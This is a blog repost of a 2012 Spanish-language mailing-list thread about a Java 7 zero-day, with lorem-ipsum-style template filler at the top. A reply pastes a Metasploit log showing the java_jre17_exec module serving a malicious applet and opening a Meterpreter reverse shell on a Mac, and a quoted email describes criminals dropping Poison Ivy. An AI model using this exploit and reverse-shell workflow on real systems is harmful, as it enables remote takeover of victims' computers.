Lorem Ipsum/DOL Differet Solmena

Separat existentie 2010 Unee MYT por scientie, musica, sport etc, litot Europa usa li sam Vocabular Lingues, differe solmen in li grammatica, li pronunciation. Delete this widget in Dashboard and add yours. This is just an example. Read More
Publicado por Terezo en 14:04

Re: [gtug-bsas] Una falla en java

lunes, 3 de septiembre de 2012

Gracias por recordarlo Walter. Lo vi el lunes pasado, incluso se puede testear el exploit con el meterpreter.

Exploit working against Mac OS X 10.7.4 (x86_64) / Safari Version 6.0 (7536.25) / Java 7 update 6 with java meterpreter
msf exploit(java_jre17_exec) > rexploit
[*] Stopping existing job...

[*] Server stopped.
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.130:4444
[*] Using URL: http://0.0.0.0:8080/irJaH9rEib2
[*] Local IP: http://192.168.1.130:8080/irJaH9rEib2
[*] Server started.
msf exploit(java_jre17_exec) > [*] 192.168.1.130 java_jre17_exec - Java 7 Applet Remote Code Execution handling request
[*] 192.168.1.130 java_jre17_exec - Sending Applet.jar
[*] 192.168.1.130 java_jre17_exec - Sending Applet.jar
[*] Sending stage (30216 bytes) to 192.168.1.130
[*] Meterpreter session 1 opened (192.168.1.130:4444 -> 192.168.1.130:49765) at 2012-08-27 13:16:32 +0200

msf exploit(java_jre17_exec) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer : Juans-MacBook-Pro.local
OS : Mac OS X 10.7.4 (x86_64)
Meterpreter : java/java
meterpreter >

https://community.rapid7.com/community/metasploit/blog/2012/08/27/lets-start-the-week-with-a-new-java-0day


On Mon, 03 Sep 2012 17:42:06 -0300
walter <gtugbahia@maqus.com.ar> wrote:

> _Una falla en Java pone tu PC en peligro
> <http://dattatecblog.com/2012/08/una-falla-en-java-pone-tu-pc-en-peligro/>
> _Bajo este tituloDattatecpone un articulo que lo envia a varios usuarios
> y clientes.
> ¿Que seriedad tiene este articulo, es realmente creible.?
>
> Rapid7 y AlienVault, entre otras empresas de seguridad informática,
> comenzaron a advertir el fin de semana pasado sobre una falla en Java
> que permite el ingreso de hackers a la PC, brindándoles el control
> completo del equipo.
>
> Las últimas versiones del software gratuito de Oracle, presente en la
> mayoría de las PCs hogareñas y de oficina, incluyen una vulnerabilidad
> que permite el ingreso a la computadora. La infección, que se produce
> sin que el usuario lo note, ocurre al visitar determinados sitios web
> donde el malware fue alojado por los criminales cibernéticos.
>
> Una vez dentro del equipo, el programa malicioso libera un segundo
> software de nombre *Poison Ivy* (hiedra venenosa, en inglés) que es el
> que permite controlar la PC.
>
>

0 comentarios:

Publicar un comentario

Nota: solo los miembros de este blog pueden publicar comentarios.

Suscribirse a: Enviar comentarios (Atom)